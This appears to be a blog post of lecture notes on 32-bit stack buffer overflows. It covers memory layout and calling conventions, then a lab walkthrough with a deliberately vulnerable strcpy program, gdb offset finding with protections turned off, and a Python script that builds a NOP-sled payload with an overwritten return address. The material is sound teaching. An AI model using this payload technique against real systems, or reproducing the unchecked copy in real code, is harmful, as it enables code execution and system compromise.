Buffer Overflow Attacks(1)

Eunji · November 3, 2025

System Security

Virtual address vs. physical address

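On a 32-bit OS, each process is given a 4 GB virtual address space, and the OS keeps the mapping between virtual addresses and physical memory in a table (the page table).
Files with the .exe extension are executables in the format used on Windows.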
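The 4 GB figure and the idea of a mapping table can be sketched in a few lines. This is only a toy model: the 4 KiB page size, the `translate` helper, and the single page-table entry are assumptions made for illustration, not details from the lecture.

```python
ADDRESS_BITS = 32
PAGE_SIZE = 4096  # assumed 4 KiB pages

# A 32-bit address can name 2**32 distinct bytes, i.e. 4 GiB.
ADDRESS_SPACE = 2 ** ADDRESS_BITS


def split_virtual_address(vaddr):
    """Split a virtual address into (virtual page number, offset in page)."""
    return vaddr // PAGE_SIZE, vaddr % PAGE_SIZE


def translate(vaddr, page_table):
    """Look up the physical frame for the page and keep the same offset."""
    page, offset = split_virtual_address(vaddr)
    frame = page_table[page]  # KeyError here models an unmapped page
    return frame * PAGE_SIZE + offset


# Hypothetical table: virtual page 0x401 is backed by physical frame 0x7.
example_table = {0x401: 0x7}
print(ADDRESS_SPACE // 2**30, "GiB")
print(hex(translate(0x00401234, example_table)))
```

Two processes can use the same virtual address because each has its own table.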

Program memory stack

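malloc() returns the start address of the allocated memory as a void * (a pointer with no element type), which can be converted to a pointer of any object type.
Converting the result of malloc() to a pointer of the desired type lets pointer arithmetic and dereferencing read and write memory using the correct element size.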

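x: initialized global variable $\rightarrow$ Data segment
a, b, ptr: local variables $\rightarrow$ Stack
- ptr: a pointer variable of type int *
y: uninitialized static local variable $\rightarrow$ BSS segment
- Its space is allocated once, at program start, and its value persists across calls
malloc() $\rightarrow$ Heap
- The region ptr points to is dynamically allocated by malloc()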

The variable 'ptr' itself is an int * pointer stored on the stack, while the memory it points to is space allocated on the heap.

int *ptr;
int **pptr = &ptr;
- pptr holds the address of the pointer variable ptr, i.e. it is a pointer to a pointer
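The pointer-to-pointer relationship can be tried out without compiling C. The sketch below uses Python's standard `ctypes` module as a stand-in for C pointers; the helper names `read_through` and `write_through` are made up for this example.

```python
import ctypes

x = ctypes.c_int(5)
ptr = ctypes.pointer(x)      # roughly: int *ptr = &x;
pptr = ctypes.pointer(ptr)   # roughly: int **pptr = &ptr;


def read_through(pp):
    """Follow both levels of indirection, like **pp in C."""
    return pp.contents.contents.value


def write_through(pp, value):
    """Store through both levels of indirection, like **pp = value in C."""
    pp.contents.contents.value = value


print(read_through(pptr))
write_through(pptr, 7)
print(x.value)  # x itself changed, because pptr -> ptr -> x
```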

Order of the function arguments in stack

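Under the 32-bit x86 C calling convention, arguments are pushed onto the stack from right to left. After the call, ebp serves as the reference point of the frame: ebp+4 holds the return address, the first argument is at ebp+8, and the second argument is at ebp+12. As a rule, positive offsets from ebp reach the arguments and negative offsets reach the local variables.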
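The ebp+8 and ebp+12 offsets follow directly from the push order, which a short simulation can confirm. This is a model only, not machine code: `build_frame` is a hypothetical helper, every slot is assumed to be 4 bytes, and the return address and saved ebp values are arbitrary.

```python
def build_frame(args, return_address, saved_ebp):
    """Return {offset_from_ebp: value} right after the callee runs 'push ebp; mov ebp, esp'."""
    stack = []  # the end of the list is the top of the stack
    for arg in reversed(args):     # caller pushes arguments right to left
        stack.append(arg)
    stack.append(return_address)   # pushed by the call instruction
    stack.append(saved_ebp)        # pushed by the callee's prologue
    # ebp now points at the saved ebp slot; each earlier push sits 4 bytes higher.
    return {4 * depth: value for depth, value in enumerate(reversed(stack))}


frame = build_frame([1, 2], return_address=0x08048456, saved_ebp=0xFFFFD400)
for offset in sorted(frame):
    print(f"ebp+{offset}: {frame[offset]:#x}")
```

Because the rightmost argument is pushed first, the first argument ends up closest to ebp.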

Function call stack

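When main() calls f(1,2), a new stack frame is created for the function f.
The start of a stack frame can be taken to be either the function's parameters or EBP (Value of x). The figure here treats the region where the function's parameters (arguments) are stored as the start of the frame.
When the call f() instruction executes, the return address is pushed onto the stack, and then the function's prologue runs, setting up the frame that holds int x.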

Stack layout for function call chain

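When bar returns, its frame is popped and execution resumes at the saved return address, so the frame just below it, foo's, becomes the current frame. When foo finishes, control returns to main in the same way.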
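The main, foo, bar chain behaves like a last-in, first-out list of frames. The sketch below models only the frame names; `call` and `ret` are illustrative helpers, not real instructions.

```python
call_stack = []


def call(name):
    """Entering a function pushes its frame on top of the caller's frame."""
    call_stack.append(name)


def ret():
    """Returning pops the current frame; the frame below becomes current."""
    call_stack.pop()
    return call_stack[-1] if call_stack else None


call("main")
call("foo")
call("bar")
print(call_stack)   # bar is on top
print(ret())        # bar returns, foo is current again
print(ret())        # foo returns, main is current again
```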

Copy data to buffer

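Even if it is not written explicitly, the compiler automatically appends a NUL byte ('\0') to the end of a string literal.
strcpy keeps copying until it reaches the NUL character, then stops.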
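The stopping rule can be imitated on a Python `bytearray` standing in for memory. `strcpy_sim` is a hypothetical model of the behaviour described above (it also copies the terminating NUL, as the C function does); it is not the libc implementation.

```python
def strcpy_sim(memory, dest, src):
    """Copy bytes from src into memory[dest:] up to and including the first NUL.

    Returns the number of bytes written. Like strcpy, it never looks at the
    size of the destination; src is assumed to contain a NUL byte.
    """
    i = 0
    while True:
        byte = src[i]
        memory[dest + i] = byte
        i += 1
        if byte == 0:
            return i


memory = bytearray(b"\xaa" * 16)
written = strcpy_sim(memory, 0, b"hi\x00ignored")
print(written, memory[:4])
```

Everything after the first NUL in the source is ignored, which is why the bytes of an attack payload must avoid 0x00 if they are copied this way.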

Buffer overflow

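A 12-byte buffer is declared as a local variable.
The string declared in main() is longer than 12 bytes, so the copy overwrites other memory located after the buffer, and a segmentation fault occurs.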

What can we do?

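The point at which the buffer overflow actually causes a problem is not when the string is written past the buffer, but when the function returns and executes ret, which behaves like 'POP EIP'. At that moment the CPU takes a corrupted return address (RET Address) from the stack, and the program tries to execute instructions at the wrong location.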
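A byte-level model makes the overwrite visible. The sketch assumes the simplest possible layout (a 12-byte buffer immediately followed by a 4-byte saved EBP and a 4-byte return address, with no padding); the helper names and the addresses are invented for illustration.

```python
import struct

BUF_SIZE = 12


def make_frame(saved_ebp, ret):
    """Model: [buffer (12 bytes)][saved EBP (4 bytes)][return address (4 bytes)]."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, ret)


def unchecked_copy(frame, data):
    """Write data plus a terminating NUL from the buffer start, with no bounds check."""
    for i, byte in enumerate(data + b"\x00"):
        frame[i] = byte


def return_address(frame):
    """Read the 4-byte little-endian value that ret would load into EIP."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


frame = make_frame(saved_ebp=0xFFFFD000, ret=0x08048123)
unchecked_copy(frame, b"A" * 8)       # fits inside the buffer
print(hex(return_address(frame)))     # unchanged
unchecked_copy(frame, b"A" * 19)      # runs past the buffer into EBP and RET
print(hex(return_address(frame)))     # now built from 'A' bytes and the NUL
```

The write itself succeeds silently; the damage only shows when the corrupted value is used as a return address.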

How to run malicious code

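In the function call mechanism, ret (conceptually 'POP EIP') pops the RET Address off the stack and stores it in EIP. An attacker can overwrite the RET Address with the address of malicious code, making the program jump to that address and giving the attacker a shell.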

Consequences of buffer overflow

Overwriting the return address with some random address can lead to:
- Invalid instruction
- Non-existing address
- Access violation
- Attacker's code
  - Malicious code to gain access

Experiment setup

On recent Ubuntu releases, '/bin/sh' is usually a symbolic link to 'dash'. Because 'dash' limits what an injected attack can do, the lab uses 'zsh' instead.

1. Turn off countermeasure: memory randomization

Along with address randomization, protections such as NX, StackGuard, and PIE are turned off.

2. Compilation

3. Execution

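'badfile' is created by reading the first 100 bytes from '/dev/urandom', the Linux random-number device.
The buffer is currently 100 bytes, so this input is handled normally.
With 160 bytes, however, the input exceeds the 100-byte buffer and overwrites adjacent memory, which causes a segmentation fault.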
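For readers who prefer a script to the shell, a rough Python equivalent of generating the random test input is sketched below. `os.urandom` is the standard library's source of OS-level random bytes; `make_random_badfile` and its parameters are names chosen for this example only.

```python
import os


def make_random_badfile(path, size):
    """Write `size` random bytes to `path` and return the resulting file size."""
    with open(path, "wb") as f:
        f.write(os.urandom(size))
    return os.path.getsize(path)


# Example usage (writes into the current directory):
#   make_random_badfile("badfile", 100)   # the size that ran normally above
#   make_random_badfile("badfile", 160)   # the size that overflowed above
```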

Vulnerable Program

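int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    /* Read up to 300 bytes of user-controlled input from badfile */
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);   /* foo copies str into a much smaller local buffer */

    printf("Returned Properly\n");
    return 1;
}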

Reading 300 bytes of data from badfile
Storing the file contents into a str variable of size 400 bytes
Calling foo function with str as an argument

badfile is created by the user, and hence its contents are under the user's control

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];

    /* strcpy does not check the size of buffer: a longer str overflows it */
    strcpy(buffer, str);

    return 1;
}

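If the attacker puts a long string in 'str', the copy overflows buffer and lets the attacker set the return address to a value of their choosing. This changes the program's control flow and can make it execute malicious code.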

Creation of the malicious input (badfile)

Task A: Offset distance between the base of the buffer and return address
Task B: Address to place the shellcode

To manipulate the return address, the attacker must know the exact offset to it, and must also know where in memory the shellcode is located in order to get a shell.

Task A: Distance between buffer base address and return address

To analyze how the stack behaves with gdb, compile with the '-g' option so that debugging symbols are included.

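$3 = 108: the distance between EBP and the start of Buffer is 108 bytes.
Buffer was declared with a size of 100 bytes, but in memory the distance from its start to EBP turns out to be 108 bytes.
The attacker needs the distance from the start of Buffer to RET, because the injected input has to overwrite RET.
Therefore, the distance is 108 + 4 (skipping over the saved EBP) = 112.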
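The same arithmetic written as a small function, so it can be reused when gdb reports different values. The function name and the example addresses are hypothetical; only the 108 and 4 come from the measurement above.

```python
def return_address_offset(ebp, buffer_start, saved_ebp_size=4):
    """Distance from the start of the buffer to the return address.

    (ebp - buffer_start) covers the buffer and any padding; the saved EBP
    (4 bytes on 32-bit x86) sits between that and the return address.
    """
    return (ebp - buffer_start) + saved_ebp_size


# Hypothetical addresses that are 108 bytes apart, as in the gdb session.
ebp = 0xFFFFD348
buffer_start = ebp - 108
print(return_address_offset(ebp, buffer_start))
```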

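gdb syntax
- p: command that prints a variable or an expression
- p/d: 'p' with a format option that prints the value in decimal
- $: prefix used to refer to a register (for example, $ebp)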

Task B: Address of malicious code

Investigation using gdb
Malicious code(shellcode) is written in the badfile which is passed as an argument to the vulnerable function
Using gdb, we can find the address of the function argument

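#include <stdio.h>

/* Prints the address of the parameter a1 itself, i.e. where the argument is stored */
void func(int* a1)
{
    /* The cast to unsigned int assumes a 32-bit build, where pointers are 4 bytes */
    printf(" :: a1's address is 0x%x \n", (unsigned int) &a1);
}

int main()
{
    int x = 3;
    func(&x);
    return 1;
}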

ASLR is enabled by default, so the process's memory addresses change on every run. For the lab, the randomize option is turned off so that the addresses stay the same.

To increase the chances of jumping to a correct address for the malicious code, we can fill the badfile with NOP instructions and place the malicious code at the end of the buffer.
- NOP: an instruction that does nothing
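How much slack the NOPs buy can be estimated from the payload layout. The sketch below uses the numbers that appear in this post (a 300-byte payload with the return address at offset 112); the 24-byte shellcode length is an assumption inferred from the figure of 276 quoted later, and the function names are illustrative.

```python
def landing_range(payload_len, shellcode_len, ret_offset, ret_size=4):
    """Return (first, last) payload offsets that are safe jump targets.

    Offsets just after the return address slot up to the first shellcode byte
    are all NOPs, so execution slides forward into the shellcode.
    """
    first = ret_offset + ret_size
    last = payload_len - shellcode_len  # offset of the first shellcode byte
    return first, last


def is_safe_target(offset, payload_len, shellcode_len, ret_offset):
    first, last = landing_range(payload_len, shellcode_len, ret_offset)
    return first <= offset <= last


print(landing_range(300, 24, 112))
print(is_safe_target(220, 300, 24, 112))
```

Without the NOPs only one offset (the first shellcode byte) would work; with them, any offset in the printed range does.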

The structure of badfile

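The contents of badfile form a binary layout, designed by the attacker, that overwrites the program's memory from the start of buffer through the return address (RET).

For the value written to RET, take care that the address does not contain a 0x00 byte. For example, if the address ends in 0x00, the copy function treats that byte as the end of the string and the input is cut off partway.
The shellcode is placed at the end of the array so that the malicious code gets executed.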
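Whether a candidate address is safe to pass through a string copy can be checked mechanically. `has_zero_byte` is a hypothetical helper that assumes a 4-byte little-endian address, as on 32-bit x86.

```python
def has_zero_byte(address):
    """True if any of the 4 bytes of the address is 0x00."""
    return 0 in address.to_bytes(4, byteorder="little")


for candidate in (0xFFFFD3B8, 0xFFFFD300, 0xFF00D3B8):
    print(hex(candidate), has_zero_byte(candidate))
```

An address ending in 0x00 is the worst case: in little-endian order that byte is written first, so the copy stops before any of the address is in place.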

Badfile construction

# `shellcode` is assumed to be a bytes object defined earlier in the script

# Fill the content with NOPs (0x90)
content = bytearray(0x90 for i in range(300))

# Put the shellcode at the end
start = 300 - len(shellcode)
content[start:] = shellcode

# Put the address at offset 112, where the return address is stored
ret = 0xffffd348 + 112 # approximate location of the shellcode
content[112:116] = (ret).to_bytes(4, byteorder='little')

# Write the content to a file
with open('badfile', 'wb') as f:
    f.write(content)

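The whole array is 300 bytes long, so the shellcode starts at offset 276 (the space left once the shellcode is excluded). The return address points to offset 220, which falls in the NOP region a little before that.
0xffffd348 + 112 (must not contain a zero byte) $\rightarrow$ the start address of the shellcode, or the address of a NOP before it. Measured from the start of buffer[], the offset is 108 + 112 = 220.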
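The 220 figure can be double-checked by reading the address back out of the payload. The sketch assumes that 0xffffd348 is the value of EBP inside foo (which is what the 108 + 112 arithmetic suggests) and uses 0xCC bytes as a stand-in for the real 24-byte shellcode; `inspect_payload` is a hypothetical helper.

```python
def inspect_payload(content, ret_offset, ebp, ebp_to_buffer):
    """Return (target address, its offset from the buffer start, byte found there)."""
    target = int.from_bytes(content[ret_offset:ret_offset + 4], "little")
    buffer_start = ebp - ebp_to_buffer
    landing = target - buffer_start
    return target, landing, content[landing]


# Rebuild a payload with the same layout, using placeholder shellcode bytes.
payload = bytearray(b"\x90" * 300)
payload[276:] = b"\xcc" * 24  # placeholder, not real shellcode
payload[112:116] = (0xFFFFD348 + 112).to_bytes(4, "little")

target, landing, byte = inspect_payload(payload, 112, ebp=0xFFFFD348, ebp_to_buffer=108)
print(hex(target), landing, hex(byte))
```

If the byte found at the landing offset is 0x90, the jump lands on a NOP and execution slides into the shellcode.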
